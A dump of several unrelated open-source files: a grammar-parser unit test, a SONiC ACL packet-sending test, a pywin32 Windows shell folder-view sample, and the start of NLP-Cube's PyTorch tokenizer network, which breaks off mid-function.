expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_allclose(
expression_tensor,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
[1., 0., 0., 0., 0.], # 'S -> S "+" T'
[0., 1., 0., 0., 0.], # 'S -> T'
[0., 0., 0., 1., 0.], # 'T -> "x"'
[0., 0., 1., 0., 0.], # 'T -> "(" S ")"'
[0., 1., 0., 0., 0.], # 'S -> T'
[0., 0., 0., 1., 0.], # 'T -> "x"'
[0., 0., 0., 0., 1.], # Padding dummy production rule.
[0., 0., 0., 0., 1.], # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_tensor_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
expression_tensor = grammar.parse_expressions_to_tensor(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_allclose(
expression_tensor,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
[0., 1., 0., 0., 0.], # 'S -> S "+" T'
[0., 0., 1., 0., 0.], # 'S -> T'
[0., 0., 0., 0., 1.], # 'T -> "x"'
[0., 0., 0., 1., 0.], # 'T -> "(" S ")"'
[0., 0., 1., 0., 0.], # 'S -> T'
[0., 0., 0., 0., 1.], # 'T -> "x"'
[1., 0., 0., 0., 0.], # Padding dummy production rule.
[1., 0., 0., 0., 0.], # Padding dummy production rule.
]
]
)
if __name__ == '__main__':
tf.test.main()
|
ansible/roles/test/files/acstests/acl_port_range_traffic_test.py | shubav/sonic-mgmt | 132 | 12687749 | <reponame>shubav/sonic-mgmt
import sys
import ptf.packet as scapy
import ptf.dataplane as dataplane
import acs_base_test
from ptf.base_tests import BaseTest
import ptf.testutils as testutils
from ptf.testutils import *
import scapy.all as scapy2
class SendTCP(acs_base_test.ACSDataplaneTest):
def runTest(self):
pkt = scapy2.Ether(src="e4:1d:2d:a5:f3:ac", dst="00:02:03:04:05:00")
pkt /= scapy2.IP(src="10.0.0.1", dst="10.0.0.0")
# get L4 port number
port_number = testutils.test_params_get("port_number")
port = port_number["port_number"]
pkt /= scapy2.TCP(sport = int(port))
pkt /= ("badabadaboom")
# get packets number
count = testutils.test_params_get("count")
pack_number = count["count"]
# send packets
send(self, 0, pkt, int(pack_number))
|
Src/StdLib/Lib/site-packages/win32comext/shell/demos/servers/folder_view.py | cwensley/ironpython2 | 1,078 | 12687759 | # This is a port of the Vista SDK "FolderView" sample, and associated
# notes at http://shellrevealed.com/blogs/shellblog/archive/2007/03/15/Shell-Namespace-Extension_3A00_-Creating-and-Using-the-System-Folder-View-Object.aspx
# A key difference to shell_view.py is that this version uses the default
# IShellView provided by the shell (via SHCreateShellFolderView) rather
# than our own.
# XXX - sadly, it doesn't work quite like the original sample. Oh well,
# another day...
import sys
import os
import pickle
import random
import win32api
import winxpgui as win32gui # the needs vista, let alone xp!
import win32con
import winerror
import commctrl
import pythoncom
from win32com.util import IIDToInterfaceName
from win32com.server.exception import COMException
from win32com.server.util import wrap as _wrap
from win32com.server.util import NewEnum as _NewEnum
from win32com.shell import shell, shellcon
from win32com.axcontrol import axcontrol # IObjectWithSite
from win32com.propsys import propsys
GUID=pythoncom.MakeIID
# If set, output spews to the win32traceutil collector...
debug=0
# wrap a python object in a COM pointer
def wrap(ob, iid=None):
return _wrap(ob, iid, useDispatcher=(debug>0))
def NewEnum(seq, iid):
return _NewEnum(seq, iid=iid, useDispatcher=(debug>0))
# The sample makes heavy use of "string ids" (ie, integer IDs defined in .h
# files, loaded at runtime from a (presumably localized) DLL. We cheat.
_sids = {} # strings, indexed bystring_id,
def LoadString(sid):
return _sids[sid]
# fn to create a unique string ID
_last_ids = 0
def _make_ids(s):
global _last_ids
_last_ids += 1
_sids[_last_ids] = s
return _last_ids
# These strings are what the user sees and would be localized.
# XXX - its possible that the shell might persist these values, so
# this scheme wouldn't really be suitable in a real ap.
IDS_UNSPECIFIED = _make_ids("unspecified")
IDS_SMALL = _make_ids("small")
IDS_MEDIUM = _make_ids("medium")
IDS_LARGE = _make_ids("large")
IDS_CIRCLE = _make_ids("circle")
IDS_TRIANGLE = _make_ids("triangle")
IDS_RECTANGLE = _make_ids("rectangle")
IDS_POLYGON = _make_ids("polygon")
IDS_DISPLAY = _make_ids("Display")
IDS_DISPLAY_TT = _make_ids("Display the item.")
IDS_SETTINGS = _make_ids("Settings")
IDS_SETTING1 = _make_ids("Setting 1")
IDS_SETTING2 = _make_ids("Setting 2")
IDS_SETTING3 = _make_ids("Setting 3")
IDS_SETTINGS_TT = _make_ids("Modify settings.")
IDS_SETTING1_TT = _make_ids("Modify setting 1.")
IDS_SETTING2_TT = _make_ids("Modify setting 2.")
IDS_SETTING3_TT = _make_ids("Modify setting 3.")
IDS_LESSTHAN5 = _make_ids("Less Than 5")
IDS_5ORGREATER = _make_ids("Five or Greater")
del _make_ids, _last_ids
# Other misc resource stuff
IDI_ICON1 = 100
IDI_SETTINGS = 101
# The sample defines a number of "category ids". Each one gets
# its own GUID.
CAT_GUID_NAME=GUID("{de094c9d-c65a-11dc-ba21-005056c00008}")
CAT_GUID_SIZE=GUID("{de094c9e-c65a-11dc-ba21-005056c00008}")
CAT_GUID_SIDES=GUID("{de094c9f-c65a-11dc-ba21-005056c00008}")
CAT_GUID_LEVEL=GUID("{de094ca0-c65a-11dc-ba21-005056c00008}")
# The next category guid is NOT based on a column (see
# ViewCategoryProvider::EnumCategories()...)
CAT_GUID_VALUE="{de094ca1-c65a-11dc-ba21-005056c00008}"
GUID_Display=GUID("{4d6c2fdd-c689-11dc-ba21-005056c00008}")
GUID_Settings=GUID("{4d6c2fde-c689-11dc-ba21-005056c00008}")
GUID_Setting1=GUID("{4d6c2fdf-c689-11dc-ba21-005056c00008}")
GUID_Setting2=GUID("{4d6c2fe0-c689-11dc-ba21-005056c00008}")
GUID_Setting3=GUID("{4d6c2fe1-c689-11dc-ba21-005056c00008}")
# Hrm - not sure what to do about the std keys.
# Probably need a simple parser for propkey.h
PKEY_ItemNameDisplay = ("{B725F130-47EF-101A-A5F1-02608C9EEBAC}", 10)
PKEY_PropList_PreviewDetails = ("{C9944A21-A406-48FE-8225-AEC7E24C211B}", 8)
# Not sure what the "3" here refers to - docs say PID_FIRST_USABLE (2) be
# used. Presumably it is the 'propID' value in the .propdesc file!
# note that the following GUIDs are also references in the .propdesc file
PID_SOMETHING=3
# These are our 'private' PKEYs
# Col 2, name="Sample.AreaSize"
PKEY_Sample_AreaSize=("{d6f5e341-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# Col 3, name="Sample.NumberOfSides"
PKEY_Sample_NumberOfSides = ("{d6f5e342-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# Col 4, name="Sample.DirectoryLevel"
PKEY_Sample_DirectoryLevel = ("{d6f5e343-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# We construct a PIDL from a pickle of a dict - turn it back into a
# dict (we should *never* be called with a PIDL that the last elt is not
# ours, so it is safe to assume we created it (assume->"ass" = "u" + "me" :)
def pidl_to_item(pidl):
# Note that only the *last* elt in the PIDL is certainly ours,
# but it contains everything we need encoded as a dict.
return pickle.loads(pidl[-1])
# Start of msdn sample port...
# make_item_enum replaces the sample's entire EnumIDList.cpp :)
def make_item_enum(level, flags):
pidls = []
nums = """zero one two three four five size seven eight nine ten""".split()
for i, name in enumerate(nums):
size = random.randint(0,255)
sides = 1
while sides in [1,2]:
sides = random.randint(0,5)
is_folder = (i % 2) != 0
# check the flags say to include it.
# (This seems strange; if you ask the same folder for, but appear
skip = False
if not (flags & shellcon.SHCONTF_STORAGE):
if is_folder:
skip = not (flags & shellcon.SHCONTF_FOLDERS)
else:
skip = not (flags & shellcon.SHCONTF_NONFOLDERS)
if not skip:
data = dict(name=name, size=size, sides=sides, level=level, is_folder=is_folder)
pidls.append([pickle.dumps(data)])
return NewEnum(pidls, shell.IID_IEnumIDList)
# start of Utils.cpp port
def DisplayItem(shell_item_array, hwnd_parent=0):
# Get the first ShellItem and display its name
if shell_item_array is None:
msg = "You must select something!"
else:
si = shell_item_array.GetItemAt(0)
name = si.GetDisplayName(shellcon.SIGDN_NORMALDISPLAY)
msg = "%d items selected, first is %r" % (shell_item_array.GetCount(), name)
win32gui.MessageBox(hwnd_parent, msg, "Hello", win32con.MB_OK)
# end of Utils.cpp port
# start of sample's FVCommands.cpp port
class Command:
def __init__(self, guid, ids, ids_tt, idi, flags, callback, children):
self.guid = guid; self.ids = ids; self.ids_tt = ids_tt
self.idi = idi; self.flags = flags; self.callback = callback;
self.children = children
assert not children or isinstance(children[0], Command)
def tuple(self):
return self.guid, self.ids, self.ids_tt, self.idi, self.flags, self.callback, self.children
# command callbacks - called back directly by us - see ExplorerCommand.Invoke
def onDisplay(items, bindctx):
DisplayItem(items)
def onSetting1(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING1), "Hello", win32con.MB_OK)
def onSetting2(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING2), "Hello", win32con.MB_OK)
def onSetting3(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING3), "Hello", win32con.MB_OK)
taskSettings = [
Command(GUID_Setting1, IDS_SETTING1, IDS_SETTING1_TT, IDI_SETTINGS, 0, onSetting1, None),
Command(GUID_Setting2, IDS_SETTING2, IDS_SETTING2_TT, IDI_SETTINGS, 0, onSetting2, None),
Command(GUID_Setting3, IDS_SETTING3, IDS_SETTING3_TT, IDI_SETTINGS, 0, onSetting3, None),
]
tasks = [
Command(GUID_Display, IDS_DISPLAY, IDS_DISPLAY_TT, IDI_ICON1, 0, onDisplay, None ),
Command(GUID_Settings, IDS_SETTINGS, IDS_SETTINGS_TT, IDI_SETTINGS, shellcon.ECF_HASSUBCOMMANDS, None, taskSettings),
]
class ExplorerCommandProvider:
_com_interfaces_ = [shell.IID_IExplorerCommandProvider]
_public_methods_ = shellcon.IExplorerCommandProvider_Methods
def GetCommands(self, site, iid):
items = [wrap(ExplorerCommand(t)) for t in tasks]
return NewEnum(items, shell.IID_IEnumExplorerCommand)
class ExplorerCommand:
_com_interfaces_ = [shell.IID_IExplorerCommand]
_public_methods_ = shellcon.IExplorerCommand_Methods
def __init__(self, cmd):
self.cmd = cmd
# The sample also appears to ignore the pidl args!?
def GetTitle(self, pidl):
return LoadString(self.cmd.ids)
def GetToolTip(self, pidl):
return LoadString(self.cmd.ids_tt)
def GetIcon(self, pidl):
# Return a string of the usual "dll,resource_id" format
# todo - just return any ".ico that comes with python" + ",0" :)
raise COMException(hresult=winerror.E_NOTIMPL)
def GetState(self, shell_items, slow_ok):
return shellcon.ECS_ENABLED
def GetFlags(self):
return self.cmd.flags
def GetCanonicalName(self):
return self.cmd.guid
def Invoke(self, items, bind_ctx):
# If no function defined - just return S_OK
if self.cmd.callback:
self.cmd.callback(items, bind_ctx)
else:
print "No callback for command ", LoadString(self.cmd.ids)
def EnumSubCommands(self):
if not self.cmd.children:
return None
items = [wrap(ExplorerCommand(c))
for c in self.cmd.children]
return NewEnum(items, shell.IID_IEnumExplorerCommand)
# end of sample's FVCommands.cpp port
# start of sample's Category.cpp port
class FolderViewCategorizer:
_com_interfaces_ = [shell.IID_ICategorizer]
_public_methods_ = shellcon.ICategorizer_Methods
description = None # subclasses should set their own
def __init__(self, shell_folder):
self.sf = shell_folder
# Determines the relative order of two items in their item identifier lists.
def CompareCategory(self, flags, cat1, cat2):
return cat1-cat2
# Retrieves the name of a categorizer, such as "Group By Device
# Type", that can be displayed in the user interface.
def GetDescription(self, cch):
return self.description
# Retrieves information about a category, such as the default
# display and the text to display in the user interface.
def GetCategoryInfo(self, catid):
# Note: this isn't always appropriate! See overrides below
return 0, str(catid) # ????
class FolderViewCategorizer_Name(FolderViewCategorizer):
description = "Alphabetical"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
ret.append(val)
return ret
class FolderViewCategorizer_Size(FolderViewCategorizer):
description = "Group By Size"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
# Why don't we just get the size of the PIDL?
val = self.sf.GetDetailsEx(pidl, PKEY_Sample_AreaSize)
val = int(val) # it probably came in a VT_BSTR variant
if val < 255//3:
cid = IDS_SMALL
elif val < 2 * 255 // 3:
cid = IDS_MEDIUM
else:
cid = IDS_LARGE
ret.append(cid)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Sides(FolderViewCategorizer):
description = "Group By Sides"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
if val==0:
cid = IDS_CIRCLE
elif val==3:
cid = IDS_TRIANGLE
elif val==4:
cid = IDS_RECTANGLE
elif val==5:
cid = IDS_POLYGON
else:
cid = IDS_UNSPECIFIED
ret.append(cid)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Value(FolderViewCategorizer):
description = "Group By Value"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
if val in "one two three four".split():
ret.append(IDS_LESSTHAN5)
else:
ret.append(IDS_5ORGREATER)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Level(FolderViewCategorizer):
description = "Group By Value"
def GetCategory(self, pidls):
return [self.sf.GetDetailsEx(pidl, PKEY_Sample_DirectoryLevel) for pidl in pidls]
class ViewCategoryProvider:
_com_interfaces_ = [shell.IID_ICategoryProvider]
_public_methods_ = shellcon.ICategoryProvider_Methods
def __init__(self, shell_folder):
self.shell_folder = shell_folder
def CanCategorizeOnSCID(self, pkey):
return pkey in [PKEY_ItemNameDisplay, PKEY_Sample_AreaSize,
PKEY_Sample_NumberOfSides, PKEY_Sample_DirectoryLevel]
# Creates a category object.
def CreateCategory(self, guid, iid):
if iid == shell.IID_ICategorizer:
if guid == CAT_GUID_NAME:
klass = FolderViewCategorizer_Name
elif guid == CAT_GUID_SIDES:
klass = FolderViewCategorizer_Sides
elif guid == CAT_GUID_SIZE:
klass = FolderViewCategorizer_Size
elif guid == CAT_GUID_VALUE:
klass = FolderViewCategorizer_Value
elif guid == CAT_GUID_LEVEL:
klass = FolderViewCategorizer_Level
else:
raise COMException(hresult=winerror.E_INVALIDARG)
return wrap(klass(self.shell_folder))
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the enumerator for the categories.
def EnumCategories(self):
# These are additional categories beyond the columns
seq = [CAT_GUID_VALUE]
return NewEnum(seq, pythoncom.IID_IEnumGUID)
# Retrieves a globally unique identifier (GUID) that represents
# the categorizer to use for the specified Shell column.
def GetCategoryForSCID(self, scid):
if scid==PKEY_ItemNameDisplay:
guid = CAT_GUID_NAME
elif scid == PKEY_Sample_AreaSize:
guid = CAT_GUID_SIZE
elif scid == PKEY_Sample_NumberOfSides:
guid = CAT_GUID_SIDES
elif scid == PKEY_Sample_DirectoryLevel:
guid = CAT_GUID_LEVEL
elif scid == pythoncom.IID_NULL:
# This can be called with a NULL
# format ID. This will happen if you have a category,
# not based on a column, that gets stored in the
# property bag. When a return is made to this item,
# it will call this function with a NULL format id.
guid = CAT_GUID_VALUE
else:
raise COMException(hresult=winerror.E_INVALIDARG)
return guid
# Retrieves the name of the specified category. This is where
# additional categories that appear under the column
# related categories in the UI, get their display names.
def GetCategoryName(self, guid, cch):
if guid == CAT_GUID_VALUE:
return "Value"
raise COMException(hresult=winerror.E_FAIL)
# Enables the folder to override the default grouping.
def GetDefaultCategory(self):
return CAT_GUID_LEVEL, (pythoncom.IID_NULL, 0)
# end of sample's Category.cpp port
# start of sample's ContextMenu.cpp port
MENUVERB_DISPLAY = 0
folderViewImplContextMenuIDs = [
("display", MENUVERB_DISPLAY, 0, ),
]
class ContextMenu:
_reg_progid_ = "Python.ShellFolderSample.ContextMenu"
_reg_desc_ = "Python FolderView Context Menu"
_reg_clsid_ = "{fed40039-021f-4011-87c5-6188b9979764}"
_com_interfaces_ = [shell.IID_IShellExtInit, shell.IID_IContextMenu, axcontrol.IID_IObjectWithSite]
_public_methods_ = shellcon.IContextMenu_Methods + shellcon.IShellExtInit_Methods + ["GetSite", "SetSite"]
_context_menu_type_ = "PythonFolderViewSampleType"
def __init__(self):
self.site = None
self.dataobj = None
def Initialize(self, folder, dataobj, hkey):
self.dataobj = dataobj
def QueryContextMenu(self, hMenu, indexMenu, idCmdFirst, idCmdLast, uFlags):
s = LoadString(IDS_DISPLAY);
win32gui.InsertMenu(hMenu, indexMenu, win32con.MF_BYPOSITION, idCmdFirst + MENUVERB_DISPLAY, s);
indexMenu += 1
# other verbs could go here...
# indicate that we added one verb.
return 1
def InvokeCommand(self, ci):
mask, hwnd, verb, params, dir, nShow, hotkey, hicon = ci
# this seems very convuluted, but its what the sample does :)
for verb_name, verb_id, flag in folderViewImplContextMenuIDs:
if isinstance(verb, int):
matches = verb==verb_id
else:
matches = verb==verb_name
if matches:
break
else:
assert False, ci # failed to find our ID
if verb_id == MENUVERB_DISPLAY:
sia = shell.SHCreateShellItemArrayFromDataObject(self.dataobj)
DisplayItem(hwnd, sia)
else:
assert False, ci # Got some verb we weren't expecting?
def GetCommandString(self, cmd, typ):
raise COMException(hresult=winerror.E_NOTIMPL)
def SetSite(self, site):
self.site = site
def GetSite(self, iid):
return self.site
# end of sample's ContextMenu.cpp port
# start of sample's ShellFolder.cpp port
class ShellFolder:
_com_interfaces_ = [shell.IID_IBrowserFrameOptions,
pythoncom.IID_IPersist,
shell.IID_IPersistFolder,
shell.IID_IPersistFolder2,
shell.IID_IShellFolder,
shell.IID_IShellFolder2,
]
_public_methods_ = shellcon.IBrowserFrame_Methods + \
shellcon.IPersistFolder2_Methods + \
shellcon.IShellFolder2_Methods
_reg_progid_ = "Python.ShellFolderSample.Folder2"
_reg_desc_ = "Python FolderView sample"
_reg_clsid_ = "{bb8c24ad-6aaa-4cec-ac5e-c429d5f57627}"
max_levels = 5
def __init__(self, level=0):
self.current_level = level
self.pidl = None # set when Initialize is called
def ParseDisplayName(self, hwnd, reserved, displayName, attr):
#print "ParseDisplayName", displayName
raise COMException(hresult=winerror.E_NOTIMPL)
def EnumObjects(self, hwndOwner, flags):
if self.current_level >= self.max_levels:
return None
return make_item_enum(self.current_level+1, flags)
def BindToObject(self, pidl, bc, iid):
tail = pidl_to_item(pidl)
# assert tail['is_folder'], "BindToObject should only be called on folders?"
# *sob*
# No point creating object just to have QI fail.
if iid not in ShellFolder._com_interfaces_:
raise COMException(hresult=winerror.E_NOTIMPL)
child = ShellFolder(self.current_level+1)
# hrmph - not sure what multiple PIDLs here mean?
# assert len(pidl)==1, pidl # expecting just relative child PIDL
child.Initialize(self.pidl + pidl)
return wrap(child, iid)
def BindToStorage(self, pidl, bc, iid):
return self.BindToObject(pidl, bc, iid)
def CompareIDs(self, param, id1, id2):
return 0 # XXX - todo - implement this!
def CreateViewObject(self, hwnd, iid):
if iid == shell.IID_IShellView:
com_folder = wrap(self)
return shell.SHCreateShellFolderView(com_folder)
elif iid == shell.IID_ICategoryProvider:
return wrap(ViewCategoryProvider(self))
elif iid == shell.IID_IContextMenu:
ws = wrap(self)
dcm = (hwnd, None, self.pidl, ws, None)
return shell.SHCreateDefaultContextMenu(dcm, iid)
elif iid == shell.IID_IExplorerCommandProvider:
return wrap(ExplorerCommandProvider())
else:
raise COMException(hresult=winerror.E_NOINTERFACE)
def GetAttributesOf(self, pidls, attrFlags):
assert len(pidls)==1, "sample only expects 1 too!"
assert len(pidls[0])==1, "expect relative pidls!"
item = pidl_to_item(pidls[0])
flags = 0
if item['is_folder']:
flags |= shellcon.SFGAO_FOLDER
if item['level'] < self.max_levels:
flags |= shellcon.SFGAO_HASSUBFOLDER
return flags
# Retrieves an OLE interface that can be used to carry out
# actions on the specified file objects or folders.
def GetUIObjectOf(self, hwndOwner, pidls, iid, inout):
assert len(pidls)==1, "oops - arent expecting more than one!"
assert len(pidls[0])==1, "assuming relative pidls!"
item = pidl_to_item(pidls[0])
if iid == shell.IID_IContextMenu:
ws = wrap(self)
dcm = (hwndOwner, None, self.pidl, ws, pidls)
return shell.SHCreateDefaultContextMenu(dcm, iid)
elif iid == shell.IID_IExtractIconW:
dxi = shell.SHCreateDefaultExtractIcon()
# dxi is IDefaultExtractIconInit
if item['is_folder']:
dxi.SetNormalIcon("shell32.dll", 4)
else:
dxi.SetNormalIcon("shell32.dll", 1)
# just return the dxi - let Python QI for IID_IExtractIconW
return dxi
elif iid == pythoncom.IID_IDataObject:
return shell.SHCreateDataObject(self.pidl, pidls, None, iid);
elif iid == shell.IID_IQueryAssociations:
elts = []
if item['is_folder']:
elts.append((shellcon.ASSOCCLASS_FOLDER, None, None))
elts.append((shellcon.ASSOCCLASS_PROGID_STR, None, ContextMenu._context_menu_type_))
return shell.AssocCreateForClasses(elts, iid)
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the display name for the specified file object or subfolder.
def GetDisplayNameOf(self, pidl, flags):
item = pidl_to_item(pidl)
if flags & shellcon.SHGDN_FORPARSING:
if flags & shellcon.SHGDN_INFOLDER:
return item['name']
else:
if flags & shellcon.SHGDN_FORADDRESSBAR:
sigdn = shellcon.SIGDN_DESKTOPABSOLUTEEDITING
else:
sigdn = shellcon.SIGDN_DESKTOPABSOLUTEPARSING
parent = shell.SHGetNameFromIDList(self.pidl, sigdn)
return parent + "\\" + item['name']
else:
return item['name']
def SetNameOf(self, hwndOwner, pidl, new_name, flags):
raise COMException(hresult=winerror.E_NOTIMPL)
def GetClassID(self):
return self._reg_clsid_
# IPersistFolder method
def Initialize(self, pidl):
self.pidl = pidl
# IShellFolder2 methods
def EnumSearches(self):
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the default sorting and display columns.
def GetDefaultColumn(self, dwres):
# result is (sort, display)
return 0, 0
# Retrieves the default state for a specified column.
def GetDefaultColumnState(self, iCol):
if iCol < 3:
return shellcon.SHCOLSTATE_ONBYDEFAULT | shellcon.SHCOLSTATE_TYPE_STR
raise COMException(hresult=winerror.E_INVALIDARG)
# Requests the GUID of the default search object for the folder.
def GetDefaultSearchGUID(self):
raise COMException(hresult=winerror.E_NOTIMPL)
# Helper function for getting the display name for a column.
def _GetColumnDisplayName(self, pidl, pkey):
item = pidl_to_item(pidl)
is_folder = item['is_folder']
if pkey == PKEY_ItemNameDisplay:
val = item['name']
elif pkey == PKEY_Sample_AreaSize and not is_folder:
val = "%d Sq. Ft." % item['size']
elif pkey == PKEY_Sample_NumberOfSides and not is_folder:
val = str(item['sides']) # not sure why str()
elif pkey == PKEY_Sample_DirectoryLevel:
val = str(item['level'])
else:
val = ''
return val
# Retrieves detailed information, identified by a
# property set ID (FMTID) and property ID (PID),
# on an item in a Shell folder.
def GetDetailsEx(self, pidl, pkey):
item = pidl_to_item(pidl)
is_folder = item['is_folder']
if not is_folder and pkey == PKEY_PropList_PreviewDetails:
return "prop:Sample.AreaSize;Sample.NumberOfSides;Sample.DirectoryLevel"
return self._GetColumnDisplayName(pidl, pkey)
# Retrieves detailed information, identified by a
# column index, on an item in a Shell folder.
def GetDetailsOf(self, pidl, iCol):
key = self.MapColumnToSCID(iCol);
if pidl is None:
data = [(commctrl.LVCFMT_LEFT, "Name"),
(commctrl.LVCFMT_CENTER, "Size"),
(commctrl.LVCFMT_CENTER, "Sides"),
(commctrl.LVCFMT_CENTER, "Level"),]
if iCol >= len(data):
raise COMException(hresult=winerror.E_FAIL)
fmt, val = data[iCol]
else:
fmt = 0 # ?
val = self._GetColumnDisplayName(pidl, key)
cxChar = 24
return fmt, cxChar, val
# Converts a column name to the appropriate
# property set ID (FMTID) and property ID (PID).
def MapColumnToSCID(self, iCol):
data = [PKEY_ItemNameDisplay, PKEY_Sample_AreaSize,
PKEY_Sample_NumberOfSides, PKEY_Sample_DirectoryLevel]
if iCol >= len(data):
raise COMException(hresult=winerror.E_FAIL)
return data[iCol]
# IPersistFolder2 methods
# Retrieves the PIDLIST_ABSOLUTE for the folder object.
def GetCurFolder(self):
# The docs say this is OK, but I suspect its a problem in this case :)
#assert self.pidl, "haven't been initialized?"
return self.pidl
# end of sample's ShellFolder.cpp port
def get_schema_fname():
me = win32api.GetFullPathName(__file__)
sc = os.path.splitext(me)[0] + ".propdesc"
assert os.path.isfile(sc), sc
return sc
def DllRegisterServer():
import _winreg
if sys.getwindowsversion()[0] < 6:
print "This sample only works on Vista"
sys.exit(1)
key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" \
"Explorer\\Desktop\\Namespace\\" + \
ShellFolder._reg_clsid_)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ShellFolder._reg_desc_)
# And special shell keys under our CLSID
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT,
"CLSID\\" + ShellFolder._reg_clsid_ + "\\ShellFolder")
# 'Attributes' is an int stored as a binary! use struct
attr = shellcon.SFGAO_FOLDER | shellcon.SFGAO_HASSUBFOLDER | \
shellcon.SFGAO_BROWSABLE
import struct
s = struct.pack("i", attr)
_winreg.SetValueEx(key, "Attributes", 0, _winreg.REG_BINARY, s)
# register the context menu handler under the FolderViewSampleType type.
keypath = "%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_)
key = _winreg.CreateKey(_winreg.HKEY_CLASSES_ROOT, keypath)
_winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, ContextMenu._reg_clsid_)
propsys.PSRegisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "registration complete."
def DllUnregisterServer():
import _winreg
paths = [
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\Namespace\\" + ShellFolder._reg_clsid_,
"%s\\shellex\\ContextMenuHandlers\\%s" % (ContextMenu._context_menu_type_, ContextMenu._reg_desc_),
]
for path in paths:
try:
_winreg.DeleteKey(_winreg.HKEY_LOCAL_MACHINE, path)
except WindowsError, details:
import errno
if details.errno != errno.ENOENT:
print "FAILED to remove %s: %s" % (path, details)
propsys.PSUnregisterPropertySchema(get_schema_fname())
print ShellFolder._reg_desc_, "unregistration complete."
if __name__=='__main__':
from win32com.server import register
register.UseCommandLine(ShellFolder, ContextMenu,
debug = debug,
finalize_register = DllRegisterServer,
finalize_unregister = DllUnregisterServer)
|
cube/networks/tokenizer.py | AliOsamaHassan/NLP-Cube | 488 | 12687780 | <gh_stars>100-1000
import sys
from cube.networks.utils import unpack, mask_concat
sys.path.append('')
import os, argparse
os.environ["TOKENIZERS_PARALLELISM"] = "false"
import pytorch_lightning as pl
import torch.nn as nn
import torch.nn.functional as F
import torch
from cube.io_utils.objects import Document, Sentence, Token, Word
from cube.io_utils.encodings import Encodings
from cube.io_utils.config import TokenizerConfig
from cube.networks.utils_tokenizer import TokenCollate
import numpy as np
from cube.networks.modules import ConvNorm, LinearNorm, MLP
from torch.utils.data import DataLoader
import random
from cube.networks.modules import WordGram
class Tokenizer(pl.LightningModule):
def __init__(self, config: TokenizerConfig, encodings: Encodings, language_codes: [] = None, ext_word_emb=0,
max_seq_len=-1):
super().__init__()
self._language_codes = language_codes
self._config = config
self._max_seq_len = max_seq_len
if not isinstance(ext_word_emb, list):
ext_word_emb = [ext_word_emb]
self._ext_word_emb = ext_word_emb
conv_layers = []
cs_inp = config.external_proj_size + config.lang_emb_size + 256 + 16
NUM_FILTERS = config.cnn_filter
for _ in range(config.cnn_layers):
conv_layer = nn.Sequential(
ConvNorm(cs_inp,
NUM_FILTERS,
kernel_size=5, stride=1,
padding=2,
dilation=1, w_init_gain='tanh'),
nn.BatchNorm1d(NUM_FILTERS))
conv_layers.append(conv_layer)
cs_inp = NUM_FILTERS // 2 + config.lang_emb_size
self._convs = nn.ModuleList(conv_layers)
self._wg = WordGram(len(encodings.char2int), num_langs=encodings.num_langs)
self._lang_emb = nn.Embedding(encodings.num_langs + 1, config.lang_emb_size, padding_idx=0)
self._spa_emb = nn.Embedding(3, 16, padding_idx=0)
self._output = LinearNorm(NUM_FILTERS // 2 + config.lang_emb_size, 5)
ext2int = []
for input_size in self._ext_word_emb:
module = MLP(input_size, config.external_proj_size)
ext2int.append(module)
self._ext_proj = nn.ModuleList(ext2int)
if self._language_codes: # only for training
self._dev_results = {i: [] for i, _ in enumerate(self._language_codes)}
self._res = {}
for language_code in self._language_codes:
self._res[language_code] = {"sent": 0., "token": 0.}
self._early_stop_meta_val = 0
self._epoch_results = {}
def forward(self, batch):
x_emb = batch['x_input']
x_spa = batch['x_input_spa']
x_lang = batch['x_lang']
x_lang = self._lang_emb(x_lang).unsqueeze(1).repeat(1, x_emb[0].shape[1], 1)
x_word_char = batch['x_word_char']
x_word_case = batch['x_word_case']
x_word_lang = batch['x_word_lang']
x_word_masks = batch['x_word_masks']
x_word_len = batch['x_word_len']
x_sent_len = batch['x_sent_len']
char_emb_packed = self._wg(x_word_char, x_word_case, x_word_lang, x_word_masks, x_word_len)
sl = x_sent_len.cpu().numpy()
x_char_emb = unpack(char_emb_packed, sl, x_emb[0].shape[1], device=self._get_device())
word_emb_ext = None
for ii in range(len(x_emb)):
we = x_emb[ii]
if word_emb_ext is None:
word_emb_ext = self._ext_proj[ii](we.float().to(self._get_device()))
else:
word_emb_ext = word_emb_ext + self._ext_proj[ii](we)
